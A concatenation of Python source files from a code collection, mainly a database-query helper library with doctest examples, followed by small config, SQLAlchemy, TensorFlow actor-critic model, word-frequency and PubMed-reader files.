def credentials(self):
"""Dict representation of all credentials for the database."""
if self.filename:
db_filename = os.path.join(os.getcwd(), self.filename)
else:
db_filename = None
return {
"username": self.username,
"password": self.password,
"hostname": self.hostname,
"port": self.port,
"filename": db_filename,
"dbname": self.dbname,
"dbtype": self.dbtype,
"schemas": self.schemas,
"limit": self.limit,
"keys_per_column": self.keys_per_column,
}
def find_table(self, search):
"""
Aggresively search through your database's schema for a table.
Parameters
-----------
search: str
glob pattern for what you're looking for
Examples
----------
>>> from db import DemoDB
>>> db = DemoDB()
>>> db.find_table("A*")
+--------+--------------------------+
| Table | Columns |
+--------+--------------------------+
| Album | AlbumId, Title, ArtistId |
| Artist | ArtistId, Name |
+--------+--------------------------+
>>> results = db.find_table("tmp*") # returns all tables prefixed w/ tmp
>>> results = db.find_table("prod_*") # returns all tables prefixed w/ prod_
>>> results = db.find_table("*Invoice*") # returns all tables containing trans
>>> results = db.find_table("*") # returns everything
"""
tables = []
for table in self.tables:
if glob.fnmatch.fnmatch(table.name, search):
tables.append(table)
return TableSet(tables)
def find_column(self, search, data_type=None):
"""
Aggresively search through your database's schema for a column.
Parameters
-----------
search: str
glob pattern for what you're looking for
data_type: str, list
(optional) specify which data type(s) you want to return
Examples
----------
>>> from db import DemoDB
>>> db = DemoDB()
>>> len(db.find_column("Name").columns)
5
>>> len(db.find_column("*Id").columns)
20
>>> len(db.find_column("*Address*").columns)
3
>>> len(db.find_column("*Address*", data_type="NVARCHAR(70)").columns)
3
>>> len(db.find_column("*e*", data_type=["NVARCHAR(70)", "INTEGER"]).columns)
17
-= Should sort in some way for all those doctests to be viable...
-= if not, there's always a random issue where rows are not in the same order, making doctest fail.
db.find_column("Name") # returns all columns named "Name"
+-----------+-------------+---------------+
| Table | Column Name | Type |
+-----------+-------------+---------------+
| Artist | Name | NVARCHAR(120) |
| Genre | Name | NVARCHAR(120) |
| MediaType | Name | NVARCHAR(120) |
| Playlist | Name | NVARCHAR(120) |
| Track | Name | NVARCHAR(200) |
+-----------+-------------+---------------+
db.find_column("*Id") # returns all columns ending w/ Id
+---------------+---------------+---------+
| Table | Column Name | Type |
+---------------+---------------+---------+
| Album | AlbumId | INTEGER |
| Album | ArtistId | INTEGER |
| Artist | ArtistId | INTEGER |
| Customer | SupportRepId | INTEGER |
| Customer | CustomerId | INTEGER |
| Employee | EmployeeId | INTEGER |
| Genre | GenreId | INTEGER |
| Invoice | InvoiceId | INTEGER |
| Invoice | CustomerId | INTEGER |
| InvoiceLine | TrackId | INTEGER |
| InvoiceLine | InvoiceLineId | INTEGER |
| InvoiceLine | InvoiceId | INTEGER |
| MediaType | MediaTypeId | INTEGER |
| Playlist | PlaylistId | INTEGER |
| PlaylistTrack | TrackId | INTEGER |
| PlaylistTrack | PlaylistId | INTEGER |
| Track | TrackId | INTEGER |
| Track | AlbumId | INTEGER |
| Track | MediaTypeId | INTEGER |
| Track | GenreId | INTEGER |
+---------------+---------------+---------+
db.find_column("*Address*") # returns all columns containing Address
+----------+----------------+--------------+
| Table | Column Name | Type |
+----------+----------------+--------------+
| Customer | Address | NVARCHAR(70) |
| Employee | Address | NVARCHAR(70) |
| Invoice | BillingAddress | NVARCHAR(70) |
+----------+----------------+--------------+
db.find_column("*Address*", data_type="NVARCHAR(70)") # returns all columns containing Address that are varchars
+----------+----------------+--------------+
| Table | Column Name | Type |
+----------+----------------+--------------+
| Customer | Address | NVARCHAR(70) |
| Employee | Address | NVARCHAR(70) |
| Invoice | BillingAddress | NVARCHAR(70) |
+----------+----------------+--------------+
db.find_column("*e*", data_type=["NVARCHAR(70)", "INTEGER"]) # returns all columns have an "e" and are NVARCHAR(70)S or INTEGERS
+-------------+----------------+--------------+
| Table | Column Name | Type |
+-------------+----------------+--------------+
| Customer | Address | NVARCHAR(70) |
| Customer | SupportRepId | INTEGER |
| Customer | CustomerId | INTEGER |
| Employee | ReportsTo | INTEGER |
| Employee | EmployeeId | INTEGER |
| Employee | Address | NVARCHAR(70) |
| Genre | GenreId | INTEGER |
| Invoice | InvoiceId | INTEGER |
| Invoice | CustomerId | INTEGER |
| Invoice | BillingAddress | NVARCHAR(70) |
| InvoiceLine | InvoiceLineId | INTEGER |
| InvoiceLine | InvoiceId | INTEGER |
| MediaType | MediaTypeId | INTEGER |
| Track | MediaTypeId | INTEGER |
| Track | Milliseconds | INTEGER |
| Track | GenreId | INTEGER |
| Track | Bytes | INTEGER |
+-------------+----------------+--------------+
"""
if isinstance(data_type, str):
data_type = [data_type]
cols = []
for table in self.tables:
for col in vars(table):
if glob.fnmatch.fnmatch(col, search):
if data_type and isinstance(getattr(table, col), Column) and getattr(table, col).type not in data_type:
continue
if isinstance(getattr(table, col), Column):
cols.append(getattr(table, col))
return ColumnSet(cols)
def _assign_limit(self, q, limit=1000):
# postgres, mysql, & sqlite
if self.dbtype in ["postgres", "redshift", "sqlite", "mysql"]:
if limit:
q = q.rstrip().rstrip(";")
q = "select * from ({q}) q limit {limit}".format(q=q, limit=limit)
return q
# mssql
else:
if limit:
q = "select top {limit} * from ({q}) q".format(limit=limit, q=q)
return q
def _apply_handlebars(self, q, data, union=True):
if (sys.version_info < (3, 0)):
q = unicode(q)
template = self.handlebars.compile(q)
if isinstance(data, list):
query = [template(item) for item in data]
query = [str(item) for item in query]
if union==True:
query = "\nUNION ALL".join(query)
else:
query = "\n".join(query)
elif isinstance(data, dict):
query = template(data)
query = str(query)
else:
return q
return query
def query(self, q, data=None, union=True, limit=None):
"""
Query your database with a raw string.
Parameters
----------
q: str
Query string to execute
data: list, dict
Optional argument for handlebars-queries. Data will be passed to the
template and rendered using handlebars.
union: bool
Whether or not "UNION ALL" handlebars templates. This will return
any handlebars queries as a single data frame.
limit: int
Number of records to return
Examples
--------
>>> from db import DemoDB
>>> db = DemoDB()
db.query("select * from Track").head(2)
TrackId Name AlbumId MediaTypeId \\\r
0 1 For Those About To Rock (We Salute You) 1 1
1 2 Balls to the Wall 2 2
<BLANKLINE>
GenreId Composer Milliseconds Bytes \\\r
0 1 <NAME>, <NAME>, <NAME> 343719 11170334
1 1 None 342562 5510424
<BLANKLINE>
UnitPrice
0 0.99
1 0.99
db.query("select * from Track", limit=10)
TrackId Name AlbumId MediaTypeId \
0 1 For Those About To Rock (We Salute You) 1 1
1 2 Balls to the Wall 2 2
2 3 Fast As a Shark 3 2
3 4 Restless and Wild 3 2
4 5 Princess of the Dawn 3 2
5 6 Put The Finger On You 1 1
6 7 Let's Get It Up 1 1
7 8 Inject The Venom 1 1
8 9 Snowballed 1 1
9 10 Evil Walks 1 1
GenreId Composer Milliseconds \
0 1 <NAME>, <NAME>, <NAME> 343719
1 1 None 342562
2 1 <NAME>, <NAME>, U. Dirkscneider & W. Ho... 230619
3 1 <NAME>, <NAME>-Diesel, <NAME>, U. D... 252051
4 1 Deaffy & R.A. Smith-Diesel 375418
5 1 <NAME>, <NAME>, <NAME> 205662
6 1 <NAME>, <NAME>, <NAME> 233926
7 1 <NAME>, <NAME>, <NAME> 210834
8 1 <NAME>, <NAME>, <NAME> 203102
9 1 <NAME>, <NAME>, <NAME> 263497
Bytes UnitPrice
0 11170334 0.99
1 5510424 0.99
2 3990994 0.99
3 4331779 0.99
4 6290521 0.99
5 6713451 0.99
6 7636561 0.99
7 6852860 0.99
8 6599424 0.99
9 8611245 0.99
>>> q = '''
... SELECT
... a.Title,
... t.Name,
... t.UnitPrice
... FROM
... Album a
... INNER JOIN
... Track t
... on a.AlbumId = t.AlbumId;
... '''
>>> len(db.query(q))
3503
db.query(q, limit=10)
Title \
0 For Those About To Rock We Salute You
1 Balls to the Wall
2 Restless and Wild
3 Restless and Wild
4 Restless and Wild
5 For Those About To Rock We Salute You
6 For Those About To Rock We Salute You
7 For Those About To Rock We Salute You
8 For Those About To Rock We Salute You
9 For Those About To Rock We Salute You
Name UnitPrice
0 For Those About To Rock (We Salute You) 0.99
1 Balls to the Wall 0.99
2 Fast As a Shark 0.99
3 Restless and Wild 0.99
4 Princess of the Dawn 0.99
5 Put The Finger On You 0.99
6 Let's Get It Up 0.99
7 Inject The Venom 0.99
8 Snowballed 0.99
9 Evil Walks 0.99
>>> template = '''
... SELECT
... '{{ name }}' as table_name,
... COUNT(*) as cnt
... FROM
... {{ name }}
... GROUP BY
... table_name
... '''
>>> data = [
... {"name": "Album"},
... {"name": "Artist"},
... {"name": "Track"}
... ]
>>>
db.query(q, data=data)
table_name cnt
0 Album 347
1 Artist 275
2 Track 3503
>>> q = '''
... SELECT
... {{#cols}}
... {{#if @last}}
... {{ . }}
... {{else}}
... {{ . }} ,
... {{/if}}
... {{/cols}}
... FROM
... Album;
... '''
>>> data = {"cols": ["AlbumId", "Title", "ArtistId"]}
>>> len(db.query(q, data=data, union=False))
347
db.query(q, data=data, union=False)
AlbumId Title ArtistId
0 1 For Those About To Rock We Salute You 1
1 2 Balls to the Wall 2
2 3 Restless and Wild 2
3 4 Let There Be Rock 1
4 5 Big Ones 3
"""
if data:
q = self._apply_handlebars(q, data, union)
if limit:
q = self._assign_limit(q, limit)
return pd.read_sql(q, self.con)
def query_from_file(self, filename, data=None, union=True, limit=None):
"""
Query your database from a file.
Parameters
----------
filename: str
A SQL script
data: list, dict
Optional argument for handlebars-queries. Data will be passed to the
template and rendered using handlebars.
union: bool
Whether or not "UNION ALL" handlebars templates. This will return
any handlebars queries as a single data frame.
limit: int
Number of records to return
Examples
--------
>>> from db import DemoDB
>>> db = DemoDB()
>>> q = '''
... SELECT
... a.Title,
... t.Name,
... t.UnitPrice
... FROM
... Album a
... INNER JOIN
... Track t
... on a.AlbumId = t.AlbumId;
... '''
>>> with open("db/tests/myscript.sql", "w") as f:
... f.write(q)
109
>>> len(db.query_from_file("db/tests/myscript.sql", limit=10))
10
db.query_from_file("db/tests/myscript.sql", limit=10)
Title \
0 For Those About To Rock We Salute You
1 Balls to the Wall
2 Restless and Wild
3 Restless and Wild
4 Restless and Wild
5 For Those About To Rock We Salute You
6 For Those About To Rock We Salute You
7 For Those About To Rock We Salute You
8 For Those About To Rock We Salute You
9 For Those About To Rock We Salute You
Name UnitPrice
0 For Those About To Rock (We Salute You) 0.99
1 Balls to the Wall 0.99
2 Fast As a Shark 0.99
3 Restless and Wild 0.99
4 Princess of the Dawn 0.99
5 Put The Finger On You 0.99
6 Let's Get It Up 0.99
7 Inject The Venom 0.99
8 Snowballed 0.99
9 Evil Walks 0.99
"""
with open(filename) as fp:
q = fp.read()
return self.query(q, data=data, union=union, limit=limit)
def _create_sqlite_metatable(self):
"""
SQLite doesn't come with any metatables (at least ones that fit into our
framework), so we're going to create them.
"""
sys.stderr.write("Indexing schema. This will take a second...")
rows_to_insert = []
tables = [row[0] for row in self.cur.execute("select name from sqlite_master where type='table';")]
for table in tables:
for row in self.cur.execute("pragma table_info('{0}')".format(table)):
rows_to_insert.append((table, row[1], row[2]))
# find for table and column names
self.cur.execute("drop table if exists tmp_dbpy_schema;")
self.cur.execute("create temp table tmp_dbpy_schema(table_name varchar, column_name varchar, data_type varchar);")
for row in rows_to_insert:
self.cur.execute("insert into tmp_dbpy_schema(table_name, column_name, data_type) values('{0}', '{1}', '{2}');".format(*row))
self.cur.execute("SELECT name, sql FROM sqlite_master where sql like '%REFERENCES%';")
# find for foreign keys
self.cur.execute("drop table if exists tmp_dbpy_foreign_keys;")
self.cur.execute("create temp table tmp_dbpy_foreign_keys(table_name varchar, column_name varchar, foreign_table varchar, foreign_column varchar);")
foreign_keys = []
self.cur.execute("SELECT name, sql FROM sqlite_master ;")
for (table_name, sql) in self.cur:
rgx = "FOREIGN KEY \(\[(.*)\]\) REFERENCES \[(.*)\] \(\[(.*)\]\)"
if sql is None:
continue
for (column_name, foreign_table, foreign_key) in re.findall(rgx, sql):
foreign_keys.append((table_name, column_name, foreign_table, foreign_key))
for row in foreign_keys:
sql_insert = "insert into tmp_dbpy_foreign_keys(table_name, column_name, foreign_table, foreign_column) values('{0}', '{1}', '{2}', '{3}');"
self.cur.execute(sql_insert.format(*row))
self.con.commit()
sys.stderr.write("finished!\n")
def refresh_schema(self, exclude_system_tables=True, use_cache=False):
"""
Pulls your database's schema again and looks for any new tables and
columns.
"""
col_meta, table_meta = self._get_db_metadata(exclude_system_tables, use_cache)
tables = self._gen_tables_from_col_tuples(col_meta)
# Three modes for refreshing schema
# 1. load directly from cache
# 2. use a single query for getting all key relationships
# 3. use the naive approach
if use_cache:
# generate our Tables, and load them into a TableSet
self._tables = TableSet([Table(self.con, self._query_templates, table_meta[t]['schema'], t, tables[t],
keys_per_column=self.keys_per_column,
foreign_keys=table_meta[t]['foreign_keys']['columns'],
ref_keys=table_meta[t]['ref_keys']['columns'])
for t in sorted(tables.keys())])
# optimize the foreign/ref key query by doing it one time, database-wide, if query is available
elif not use_cache and isinstance(self._query_templates.get('system', {}).get('foreign_keys_for_db', None), str):
self.cur.execute(self._query_templates['system']['foreign_keys_for_db'])
table_db_foreign_keys = defaultdict(list)
for rel in self.cur:
# second value in relationship tuple is the table name
table_db_foreign_keys[rel[1]].append(rel)
self.cur.execute(self._query_templates['system']['ref_keys_for_db'])
table_db_ref_keys = defaultdict(list)
for rel in self.cur:
# second value in relationship tuple is the table name
table_db_ref_keys[rel[1]].append(rel)
# generate our Tables, and load them into a TableSet
self._tables = TableSet([Table(self.con, self._query_templates, tables[t][0].schema, t, tables[t],
keys_per_column=self.keys_per_column,
foreign_keys=table_db_foreign_keys[t], ref_keys=table_db_ref_keys[t])
for t in sorted(tables.keys())])
elif not use_cache:
self._tables = TableSet([Table(self.con, self._query_templates, tables[t][0].schema, t, tables[t],
keys_per_column=self.keys_per_column) for t in sorted(tables.keys())])
sys.stderr.write("done!\n")
def _get_db_metadata(self, exclude_system_tables, use_cache):
col_meta = []
table_meta = {}
# pull out column metadata for all tables as list of tuples if told to use cached metadata
if use_cache and self._metadata_cache:
sys.stderr.write("Loading cached metadata. Please wait...")
for table in self._metadata_cache:
# table metadata
table_meta[table['name']] = {k: table[k] for k in ('schema', 'name', 'foreign_keys', 'ref_keys')}
# col metadata: format as list of tuples, to match how normal loading is performed
for col in table['columns']:
col_meta.append((col['schema'], col['table'], col['name'], col['type']))
else:
sys.stderr.write("Refreshing schema. Please wait...")
if self.schemas is not None and isinstance(self.schemas, list) and 'schema_specified' in \
self._query_templates['system']:
schemas_str = ','.join([repr(schema) for schema in self.schemas])
q = self._query_templates['system']['schema_specified'] % schemas_str
elif exclude_system_tables:
q = self._query_templates['system']['schema_no_system']
else:
q = self._query_templates['system']['schema_with_system']
self.cur.execute(q)
col_meta = self.cur
return col_meta, table_meta
def _gen_tables_from_col_tuples(self, cols):
tables = {}
# generate our Columns, and attach to each table to the table name in dict
for (table_schema, table_name, column_name, data_type) in cols:
if table_name not in tables:
tables[table_name] = []
tables[table_name].append(Column(self.con, self._query_templates, table_schema,
table_name, column_name, data_type, self.keys_per_column))
return tables
def _try_command(self, cmd):
try:
self.cur.execute(cmd)
except Exception as e:
print ("Error executing command:")
print ("\t '{0}'".format(cmd))
print ("Exception: {0}".format(e))
self.con.rollback()
def to_redshift(self, name, df, drop_if_exists=False, chunk_size=10000,
AWS_ACCESS_KEY=None, AWS_SECRET_KEY=None, s3=None,
print_sql=False, bucket_location=None, s3_bucket=None):
"""
Upload a dataframe to redshift via s3.
Parameters
----------
name: str
name for your shiny new table
df: DataFrame
data frame you want to save to the db
drop_if_exists: bool (False)
whether you'd like to drop the table if it already exists
chunk_size: int (10000)
Number of DataFrame chunks to upload and COPY from S3. Upload speed
is *much* faster if chunks = multiple-of-slices. Ex: DW1.XL nodes
have 2 slices per node, so if running 2 nodes you will want
chunk_size=4, 8, etc
AWS_ACCESS_KEY: str
your aws access key. if this is None, the function will try
and grab AWS_ACCESS_KEY from your environment variables
AWS_SECRET_KEY: str
your aws secrety key. if this is None, the function will try
and grab AWS_SECRET_KEY from your environment variables
s3: S3
alternative to using keys, you can use an S3 object
print_sql: bool (False)
option for printing sql statement that will be executed
bucket_location: boto.s3.connection.Location
a specific AWS location in which to create the temporary transfer s3
bucket. This should match your redshift cluster's region.
Examples
--------
"""
if self.dbtype!="redshift":
raise Exception("Sorry, feature only available for redshift.")
try:
from boto.s3.connection import S3Connection
from boto.s3.key import Key
from boto.s3.connection import Location
# if boto is present, set the bucket_location to default.
# we can't do this in the function definition because we're
# lazily importing boto only if necessary here.
if bucket_location is None:
bucket_location = Location.DEFAULT
except ImportError:
raise Exception("Couldn't find boto library. Please ensure it is installed")
if s3 is not None:
AWS_ACCESS_KEY = s3.access_key
AWS_SECRET_KEY = s3.secret_key
if AWS_ACCESS_KEY is None:
AWS_ACCESS_KEY = os.environ.get('AWS_ACCESS_KEY')
if AWS_SECRET_KEY is None:
AWS_SECRET_KEY = os.environ.get('AWS_SECRET_KEY')
if AWS_ACCESS_KEY is None:
raise Exception("Must specify AWS_ACCESS_KEY as either function argument or as an environment variable `AWS_ACCESS_KEY`")
if AWS_SECRET_KEY is None:
raise Exception("Must specify AWS_SECRET_KEY as either function argument or as an environment variable `AWS_SECRET_KEY`")
conn = S3Connection(AWS_ACCESS_KEY, AWS_SECRET_KEY)
#this way users with permission on specific buckets can use this feature
bucket_name = "dbpy-{0}".format(uuid.uuid4())
if s3_bucket:
bucket = conn.get_bucket(s3_bucket)
bucket_name = s3_bucket
else:
bucket = conn.create_bucket(bucket_name, location=bucket_location)
# we're going to chunk the file into pieces. according to amazon, this is
# much faster when it comes time to run the \COPY statment.
#
# see http://docs.aws.amazon.com/redshift/latest/dg/t_splitting-data-files.html
sys.stderr.write("Transfering {0} to s3 in chunks".format(name))
len_df = len(df)
chunks = range(0, len_df, chunk_size)
def upload_chunk(i):
conn = S3Connection(AWS_ACCESS_KEY, AWS_SECRET_KEY)
chunk = df[i:(i+chunk_size)]
k = Key(bucket)
k.key = '<KEY>' % (i, i + chunk_size)
k.set_metadata('parent', 'db.py')
out = StringIO()
with gzip.GzipFile(fileobj=out, mode="w") as f:
f.write(chunk.to_csv(index=False, encoding='utf-8'))
k.set_contents_from_string(out.getvalue())
sys.stderr.write(".")
return i
threads = []
for i in chunks:
t = threading.Thread(target=upload_chunk, args=(i, ))
t.start()
threads.append(t)
# join all threads
for t in threads:
t.join()
sys.stderr.write("done\n")
if drop_if_exists:
sql = "DROP TABLE IF EXISTS {0};".format(name)
if print_sql:
sys.stderr.write(sql + "\n")
self._try_command(sql)
# generate schema from pandas and then adapt for redshift
sql = pd.io.sql.get_schema(df, name)
# defaults to using SQLite format. need to convert it to Postgres
sql = sql.replace("[", "").replace("]", "")
# we'll create the table ONLY if it doens't exist
sql = sql.replace("CREATE TABLE", "CREATE TABLE IF NOT EXISTS")
if print_sql:
sys.stderr.write(sql + "\n")
self._try_command(sql)
self.con.commit()
# perform the \COPY here. the s3 argument is a prefix, so it'll pick up
# all of the data*.gz files we've created
sys.stderr.write("Copying data from s3 to redshfit...")
sql = """
copy {name} from 's3://{bucket_name}/data'
credentials 'aws_access_key_id={AWS_ACCESS_KEY};aws_secret_access_key={AWS_SECRET_KEY}'
CSV IGNOREHEADER as 1 GZIP;
""".format(name=name, bucket_name=bucket_name,
AWS_ACCESS_KEY=AWS_ACCESS_KEY, AWS_SECRET_KEY=AWS_SECRET_KEY)
if print_sql:
sys.stderr.write(sql + "\n")
self._try_command(sql)
self.con.commit()
sys.stderr.write("done!\n")
# tear down the bucket
sys.stderr.write("Tearing down bucket...")
for key in bucket.list():
key.delete()
if not s3_bucket:
conn.delete_bucket(bucket_name)
sys.stderr.write("done!")
def to_dict(self):
"""Dict representation of the database as credentials plus tables dict representation."""
db_dict = self.credentials
db_dict.update(self.tables.to_dict())
return db_dict
def list_profiles():
"""
Lists all of the database profiles available
Examples
--------
No doctest, covered by unittest
list_profiles()
{'demo': {u'dbname': None,
u'dbtype': u'sqlite',
u'filename': u'/Users/glamp/repos/yhat/opensource/db.py/db/data/chinook.sqlite',
u'hostname': u'localhost',
u'password': None,
u'port': 5432,
u'username': None},
'muppets': {u'dbname': u'muppetdb',
u'dbtype': u'postgres',
u'filename': None,
u'hostname': u'muppets.yhathq.com',
u'password': <PASSWORD>,
u'port': 5432,
u'username': u'kermit'}}
"""
profiles = {}
user = os.path.expanduser("~")
for f in os.listdir(user):
if f.startswith(".db.py_"):
profile = load_from_json(os.path.join(user, f))
tables = profile.pop('tables', None)
if tables:
profile['metadata'] = True
else:
profile['metadata'] = False
profiles[f[7:]] = profile
return profiles
def remove_profile(name, s3=False):
"""
Removes a profile from your config
"""
user = os.path.expanduser("~")
if s3:
f = os.path.join(user, S3_PROFILE_ID + name)
else:
f = os.path.join(user, DBPY_PROFILE_ID + name)
try:
try:
open(f)
except:
raise Exception("Profile '{0}' does not exist. Could not find file {1}".format(name, f))
os.remove(f)
except Exception as e:
raise Exception("Could not remove profile {0}! Excpetion: {1}".format(name, e))
def DemoDB(keys_per_column=None, **kwargs):
"""
Provides an instance of DB that hooks up to the Chinook DB
See http://chinookdatabase.codeplex.com/ for more info.
"""
_ROOT = os.path.abspath(os.path.dirname(__file__))
chinook = os.path.join(_ROOT, 'data', 'chinook.sqlite')
return DB(filename=chinook, dbtype='sqlite', keys_per_column=keys_per_column, **kwargs)
| 2.09375 | 2 |
app/src/config.py | LucasLaibly/Intrusion | 0 | 12797506 | <reponame>LucasLaibly/Intrusion
class Development(object):
DEBUG: True
class Testing(object):
DEBUG: False
class Production(object):
DEBUG: False
| 1.625 | 2 |
backend/db/entities/commited/base.py | R-N/sistem_gaji_vue_thrift | 0 | 12797507 | from sqlalchemy import MetaData
from sqlalchemy.ext.declarative import declarative_base
DbCommitedEntity = declarative_base(metadata=MetaData(schema="commited")) | 1.828125 | 2 |
src/models/lstm_selfattention_embedding.py | okason97/STONK | 2 | 12797508 | <gh_stars>1-10
import tensorflow as tf
import tensorflow_probability as tfp
from tensorflow.keras import Model, Sequential
from tensorflow.keras.layers import Activation, Layer, Dense, Conv1D, BatchNormalization, Dropout, LayerNormalization, LSTM, Embedding, Bidirectional
import numpy as np
def scaled_dot_product_attention(q, k, v, mask):
matmul_qk = tf.matmul(q, k, transpose_b=True) # (..., seq_len_q, seq_len_k)
# scale matmul_qk
dk = tf.cast(tf.shape(k)[-1], tf.float32)
scaled_attention_logits = matmul_qk / tf.math.sqrt(dk)
# add the mask to the scaled tensor.
if mask is not None:
scaled_attention_logits += (mask * -1e9)
# softmax is normalized on the last axis (seq_len_k) so that the scores
# add up to 1.
attention_weights = tf.nn.softmax(scaled_attention_logits, axis=-1) # (..., seq_len_q, seq_len_k)
output = tf.matmul(attention_weights, v) # (..., seq_len_q, depth_v)
return output, attention_weights
class MultiHeadAttention(Layer):
def __init__(self, d_model, num_heads):
super(MultiHeadAttention, self).__init__()
self.num_heads = num_heads
self.d_model = d_model
assert d_model % self.num_heads == 0
self.depth = d_model // self.num_heads
self.wq = Dense(d_model)
self.wk = Dense(d_model)
self.wv = Dense(d_model)
self.dense = Dense(d_model)
def split_heads(self, x, batch_size):
"""Split the last dimension into (num_heads, depth).
Transpose the result such that the shape is (batch_size, num_heads, seq_len, depth)
"""
x = tf.reshape(x, (batch_size, -1, self.num_heads, self.depth))
return tf.transpose(x, perm=[0, 2, 1, 3])
def call(self, v, k, q, mask):
batch_size = tf.shape(q)[0]
q = self.wq(q) # (batch_size, seq_len, d_model)
k = self.wk(k) # (batch_size, seq_len, d_model)
v = self.wv(v) # (batch_size, seq_len, d_model)
q = self.split_heads(q, batch_size) # (batch_size, num_heads, seq_len_q, depth)
k = self.split_heads(k, batch_size) # (batch_size, num_heads, seq_len_k, depth)
v = self.split_heads(v, batch_size) # (batch_size, num_heads, seq_len_v, depth)
# scaled_attention.shape == (batch_size, num_heads, seq_len_q, depth)
# attention_weights.shape == (batch_size, num_heads, seq_len_q, seq_len_k)
scaled_attention, attention_weights = scaled_dot_product_attention(
q, k, v, mask)
scaled_attention = tf.transpose(scaled_attention, perm=[0, 2, 1, 3]) # (batch_size, seq_len_q, num_heads, depth)
concat_attention = tf.reshape(scaled_attention,
(batch_size, -1, self.d_model)) # (batch_size, seq_len_q, d_model)
output = self.dense(concat_attention) # (batch_size, seq_len_q, d_model)
return output, attention_weights
class AttentionBlock(Layer):
def __init__(self, hidden_dim=1024, num_filters=128, kernel_size=5,
name="attention block", rate=0.1, residual=True, last=False, **kwargs):
super(AttentionBlock, self).__init__(name=name, **kwargs)
self.attention_layer = MultiHeadAttention(d_model=hidden_dim, num_heads=8)
self.dropout1 = Dropout(rate)
self.layernorm1 = LayerNormalization(epsilon=1e-6)
self.cnn_layer = Conv1D(
filters=num_filters,
kernel_size=kernel_size,
# Use 'same' padding so outputs have the same shape as inputs.
padding='same')
self.activation_layer = Activation('relu')
self.dense1 = Dense(hidden_dim/2)
self.dense2 = Dense(hidden_dim)
self.dropout2 = Dropout(rate)
self.layernorm2 = LayerNormalization(epsilon=1e-6)
self.residual = residual
self.last = last
def call(self, x, training, mask=None):
cl_output = self.activation_layer(self.cnn_layer(x))
attn_output, _ = self.attention_layer(cl_output,cl_output,cl_output,mask)
attn_output = self.dropout1(attn_output, training=training)
if self.residual:
x = self.layernorm1(x + attn_output)
else:
x = self.layernorm1(attn_output)
if not self.last:
ff_output = self.dense1(x)
ff_output = self.dense2(ff_output)
ff_output = self.dropout2(ff_output, training=training)
x = self.layernorm2(x + ff_output)
return x
class SharedBlock(Layer):
def __init__(self, hidden_dim=1024, num_filters=128, lstm_units=10, num_blocks=2, vocabulary_size=184, embedding_out = 8,
text_lenght=5, in_lstm_units = 32, name="shared block", kernel_size=5, **kwargs):
super(SharedBlock, self).__init__(name=name, **kwargs)
self.embedding = Embedding(vocabulary_size, embedding_out, input_length=text_lenght)
self.bidirectional_lstm = Bidirectional(LSTM(in_lstm_units))
self.attention_blocks = [AttentionBlock(hidden_dim=hidden_dim, num_filters=num_filters, residual=i!=0,
last=i==num_blocks-1)
for i in range(num_blocks)]
self.lstm_layer = LSTM(lstm_units)
def call(self, x, z, training, mask=None):
z = self.embedding(z)
z = self.bidirectional_lstm(z)
z = tf.reshape(tf.tile(z, [x.shape[1], 1]),
[x.shape[0], x.shape[1], z.shape[1]])
x = tf.concat([x, z], -1)
for attention_block in self.attention_blocks:
x = attention_block(x)
return self.lstm_layer(x)
class Actor(Layer):
def __init__(self, num_policies, hidden_dim=1024, num_filters=128, lstm_units=10, num_blocks=2, vocabulary_size=184,
embedding_out = 8, in_lstm_units = 32, text_lenght=5, kernel_size=5, name="actor", **kwargs):
super(Actor, self).__init__(name=name, **kwargs)
self.shared_block = SharedBlock(hidden_dim=hidden_dim, num_filters=num_filters, lstm_units=lstm_units,
num_blocks=num_blocks, vocabulary_size=vocabulary_size, text_lenght=5,
in_lstm_units = in_lstm_units, embedding_out = embedding_out)
self.dense_layer = Dense(num_policies, name='actor_output')
def call(self, x, z):
x = self.shared_block(x, z)
return self.dense_layer(x)
class Critic(Layer):
def __init__(self, hidden_dim=1024, num_filters=128, lstm_units=10, num_blocks=2, vocabulary_size=184, embedding_out = 8,
text_lenght=5, in_lstm_units = 32, kernel_size=5, name="critic", **kwargs):
super(Critic, self).__init__(name=name, **kwargs)
self.shared_block = SharedBlock(hidden_dim=hidden_dim, num_filters=num_filters, lstm_units=lstm_units,
num_blocks=num_blocks, vocabulary_size=vocabulary_size, text_lenght=5,
in_lstm_units = in_lstm_units, embedding_out = embedding_out)
self.dense_layer = Dense(1, name='critic_output')
def call(self, x, z):
x = self.shared_block(x, z)
return self.dense_layer(x)
class ActorCritic(Model):
def __init__(self, num_policies, hidden_dim=1024, num_filters=128, lstm_units=10, num_blocks=2,
vocabulary_size=184, text_lenght=5, kernel_size=5, in_lstm_units = 32, embedding_out = 8,
actor_activation=False):
super(ActorCritic, self).__init__()
self.actor = Actor(num_policies = num_policies, hidden_dim=hidden_dim, text_lenght=5,
num_filters=num_filters, lstm_units=lstm_units, num_blocks=num_blocks,
in_lstm_units = in_lstm_units, vocabulary_size=vocabulary_size, embedding_out = embedding_out)
self.critic = Critic(hidden_dim=hidden_dim, num_filters=num_filters, lstm_units=lstm_units, num_blocks=num_blocks,
in_lstm_units = in_lstm_units, text_lenght=5, embedding_out = embedding_out,
vocabulary_size=vocabulary_size)
self.logstd = tf.Variable(np.zeros([1, num_policies]), dtype=tf.float32 ,name='logstd')
self.actor_activation = actor_activation
if self.actor_activation:
self.actor_activation_layer = Activation('sigmoid')
def call(self, x, z):
# Critic
value = self.critic(x, z)
# Actor
actor_output = self.actor(x, z)
std = tf.zeros_like(actor_output) + tf.exp(self.logstd)
if self.actor_activation:
actor_output = self.actor_activation_layer(actor_output)
dist = tfp.distributions.Normal(loc=actor_output, scale=std)
return value, dist | 2.140625 | 2 |
analyze.py | DMinghao/FreelancerJobAnalysis | 2 | 12797509 | import pandas as pd
import numpy as np
import nltk
nltk.download('punkt')
import os
import nltk.corpus
from nltk.probability import FreqDist
from nltk.tokenize import word_tokenize
# read result
result = pd.read_csv("result.csv")
Tags = result["Tag"]
print(Tags)
allTag = ""
for row in result.index:
allTag = allTag + " " + result['Tag'][row]
token = word_tokenize(allTag)
# find most popular 20tag
fdist = FreqDist(token)
fdist20 = fdist.most_common(20)
print(fdist20) | 3.109375 | 3 |
web/pubmed_reader.py | BioSystemsUM/biotmpy | 13 | 12797510 | <filename>web/pubmed_reader.py
from Bio.Entrez import efetch, read
from Bio import Entrez
import os
import sys
sys.path.append(os.path.dirname(os.path.dirname(__file__)))
import nltk
from data_structures.document import Document
from data_structures.sentence import Sentence
from data_structures.token import Token
from wrappers.dictionary_wrapper import get_sentences_dictionary, get_tokens_dictionary
import string
from pdftitle import get_title_from_io
def pmids_to_docs(pmids, email, dl_config):
docs = []
pmids_not_found = []
for pmid in pmids:
sentences = []
